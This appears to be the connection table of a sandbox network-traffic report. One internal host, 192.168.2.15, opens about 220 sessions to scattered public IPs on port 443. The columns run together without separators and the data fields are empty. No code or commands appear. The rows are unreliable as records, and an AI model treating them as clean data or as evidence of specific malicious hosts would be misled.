                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18514192.168.2.1549110136.60.185.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18515192.168.2.1556674162.228.241.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18516192.168.2.1555094206.240.221.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18517192.168.2.1548310114.133.40.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18518192.168.2.1548116175.1.97.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18519192.168.2.1536344192.57.181.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18520192.168.2.1550522197.233.203.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18521192.168.2.1542976152.162.209.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18522192.168.2.155254019.248.144.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18523192.168.2.1545210217.95.160.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18524192.168.2.1558630106.247.26.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18525192.168.2.1538864178.104.215.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18526192.168.2.155974235.62.38.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18527192.168.2.1551208204.177.44.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18528192.168.2.154846274.9.183.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18529192.168.2.155961640.205.202.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18530192.168.2.153402890.228.123.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18531192.168.2.1536444191.13.14.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18532192.168.2.1560540181.61.208.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18533192.168.2.1546982134.111.92.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18534192.168.2.1549584209.70.219.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18535192.168.2.1557562191.86.252.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18536192.168.2.155991417.66.126.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18537192.168.2.1546542199.84.194.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18538192.168.2.1533550172.119.13.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18539192.168.2.1551588139.192.120.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18540192.168.2.155607281.59.155.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18541192.168.2.154948820.30.33.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18542192.168.2.1533636117.198.245.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18543192.168.2.1558068192.228.150.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18544192.168.2.154863044.200.21.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18545192.168.2.1540580197.164.209.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18546192.168.2.1538572152.223.42.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18547192.168.2.1540380136.69.172.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18548192.168.2.154869059.233.251.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18549192.168.2.156094289.154.148.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18550192.168.2.1553004113.157.130.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18551192.168.2.1534842145.71.177.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18552192.168.2.1534868109.2.149.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18553192.168.2.1559560128.51.130.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18554192.168.2.1546654170.207.112.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18555192.168.2.1535096112.44.222.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18556192.168.2.1550142204.232.253.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18557192.168.2.1540736196.245.232.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18558192.168.2.155203641.140.198.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18559192.168.2.153508695.162.249.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18560192.168.2.1547630130.10.79.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18561192.168.2.1542030185.79.201.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18562192.168.2.155725686.255.231.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18563192.168.2.1548036157.217.202.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18564192.168.2.1535962171.33.165.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18565192.168.2.1534160116.188.210.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18566192.168.2.1539810203.11.68.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18567192.168.2.1535316165.254.167.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18568192.168.2.1549502102.49.79.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18569192.168.2.1544848212.41.17.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18570192.168.2.155240025.215.5.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18571192.168.2.1560088193.39.21.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18572192.168.2.1554808102.113.119.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18573192.168.2.155456091.122.173.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18574192.168.2.155824464.32.117.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18575192.168.2.154150891.93.137.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18576192.168.2.1549158104.110.172.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18577192.168.2.1533402124.80.46.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18578192.168.2.1551558170.227.137.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18579192.168.2.155038223.113.52.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18580192.168.2.1546400112.191.225.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18581192.168.2.1543506115.226.153.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18582192.168.2.1549936195.222.254.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18583192.168.2.153886874.188.117.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18584192.168.2.15596008.165.43.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18585192.168.2.1536070189.67.190.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18586192.168.2.1533946135.61.90.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18587192.168.2.155452671.247.40.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18588192.168.2.1532820185.73.102.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18589192.168.2.1542116193.196.29.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18590192.168.2.1549746222.119.173.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18591192.168.2.1540624132.16.75.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18592192.168.2.155006044.210.61.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18593192.168.2.1549418155.172.110.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18594192.168.2.1556486191.101.195.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18595192.168.2.1541788148.19.55.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18596192.168.2.1549990142.139.112.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18597192.168.2.155273253.235.97.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18598192.168.2.1553412216.195.169.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18599192.168.2.1541870159.194.201.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18600192.168.2.155666286.147.118.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18601192.168.2.154018882.52.220.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18602192.168.2.1533410187.226.35.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18603192.168.2.1556116125.228.130.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18604192.168.2.154055449.127.82.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18605192.168.2.1551440160.52.152.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18606192.168.2.1541114218.94.149.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18607192.168.2.1537668196.7.86.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18608192.168.2.1541376186.234.59.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18609192.168.2.1542386217.23.77.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18610192.168.2.1542172107.92.193.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18611192.168.2.1558698143.158.225.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18612192.168.2.153909480.163.29.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18613192.168.2.1542142145.69.149.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18614192.168.2.1533268188.248.109.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18615192.168.2.1549536209.178.87.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18616192.168.2.154350660.105.41.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18617192.168.2.155303075.26.75.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18618192.168.2.1543744105.29.163.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18619192.168.2.1542812139.120.85.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18620192.168.2.155093070.18.14.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18621192.168.2.1535024157.164.77.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18622192.168.2.155800885.64.250.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18623192.168.2.1532962140.237.97.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18624192.168.2.1553426160.201.33.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18625192.168.2.15606109.184.206.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18626192.168.2.154327427.46.185.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18627192.168.2.1541194161.48.196.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18628192.168.2.155898459.70.28.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18629192.168.2.1549168165.125.174.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18630192.168.2.154624676.221.76.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18631192.168.2.154983058.190.81.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18632192.168.2.1541254165.207.72.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18633192.168.2.154357217.132.232.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18634192.168.2.154731845.32.223.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18635192.168.2.1542482184.44.152.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18636192.168.2.1556434216.45.213.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18637192.168.2.154847692.110.65.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18638192.168.2.153742642.58.56.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18639192.168.2.1554500130.138.22.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18640192.168.2.1541692180.74.150.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18641192.168.2.1535526207.171.122.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18642192.168.2.153911276.206.186.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18643192.168.2.153489223.203.182.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18644192.168.2.1556970104.131.7.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18645192.168.2.1560036150.37.73.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18646192.168.2.1540914112.219.130.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18647192.168.2.154917035.177.128.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18648192.168.2.1559130135.122.73.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18649192.168.2.1557918141.172.178.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18650192.168.2.1537288166.142.230.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18651192.168.2.154409048.118.225.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18652192.168.2.15443205.76.62.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18653192.168.2.1556548188.208.7.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18654192.168.2.1559914154.74.137.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18655192.168.2.1550926115.35.224.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18656192.168.2.1537388209.31.23.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18657192.168.2.1537948207.221.57.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18658192.168.2.155980276.152.117.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18659192.168.2.1534306218.42.117.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18660192.168.2.155310812.187.10.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18661192.168.2.1549022211.204.115.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18662192.168.2.1556806133.29.134.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18663192.168.2.1559044116.7.78.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18664192.168.2.1546616216.130.84.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18665192.168.2.1543112123.1.45.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18666192.168.2.15407308.87.41.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18667192.168.2.1534834140.35.219.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18668192.168.2.1547724181.102.166.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18669192.168.2.1541422147.60.36.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18670192.168.2.1554296184.3.126.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18671192.168.2.153973274.159.56.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18672192.168.2.1539792107.59.170.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18673192.168.2.153654492.121.100.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18674192.168.2.1537302190.23.193.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18675192.168.2.1546670114.232.74.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18676192.168.2.1560032203.19.190.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18677192.168.2.1542076148.7.12.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18678192.168.2.1535578132.184.158.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18679192.168.2.1547444160.213.131.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18680192.168.2.1552366201.168.127.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18681192.168.2.155540665.205.129.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18682192.168.2.1557318132.144.134.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18683192.168.2.1537840112.197.8.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18684192.168.2.1557440131.85.155.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18685192.168.2.155263292.19.87.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18686192.168.2.1556898111.27.149.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18687192.168.2.1543652155.242.196.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18688192.168.2.1537350220.69.213.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18689192.168.2.154386265.226.40.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18690192.168.2.1555690144.127.116.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18691192.168.2.1539962172.172.33.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18692192.168.2.1544298222.156.86.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18693192.168.2.1537110165.94.128.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18694192.168.2.1532830124.73.202.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18695192.168.2.154244295.113.57.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18696192.168.2.155160231.232.136.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18697192.168.2.1547762154.162.66.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18698192.168.2.1554462147.219.220.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18699192.168.2.155362271.117.32.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18700192.168.2.154016668.56.108.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18701192.168.2.1548032185.246.208.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18702192.168.2.1552274187.87.244.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18703192.168.2.1539534112.187.136.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18704192.168.2.1540340182.123.235.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18705192.168.2.155465062.203.202.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18706192.168.2.1560074197.142.113.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18707192.168.2.1547652187.48.2.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18708192.168.2.1545732167.97.233.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18709192.168.2.1555024150.23.14.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18710192.168.2.1542956189.223.1.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18711192.168.2.1540464216.241.41.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18712192.168.2.1544096174.37.39.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18713192.168.2.1546322192.72.95.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18714192.168.2.1560986179.113.12.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18715192.168.2.1551088146.101.249.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18716192.168.2.153288487.215.165.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18717192.168.2.15441888.174.233.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18718192.168.2.154636289.194.29.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18719192.168.2.1535562129.41.40.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18720192.168.2.155988675.1.98.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18721192.168.2.155437041.103.142.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18722192.168.2.153917263.19.78.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18723192.168.2.1535808158.117.169.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18724192.168.2.154106418.167.211.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18725192.168.2.15555325.66.231.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18726192.168.2.1544004124.88.71.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18727192.168.2.1558504180.91.176.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18728192.168.2.154378479.45.204.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18729192.168.2.15515109.201.35.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18730192.168.2.153378239.183.238.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18731192.168.2.154205476.203.133.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18732192.168.2.153716073.125.192.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18733192.168.2.15409062.210.240.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18734192.168.2.1553492222.143.32.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
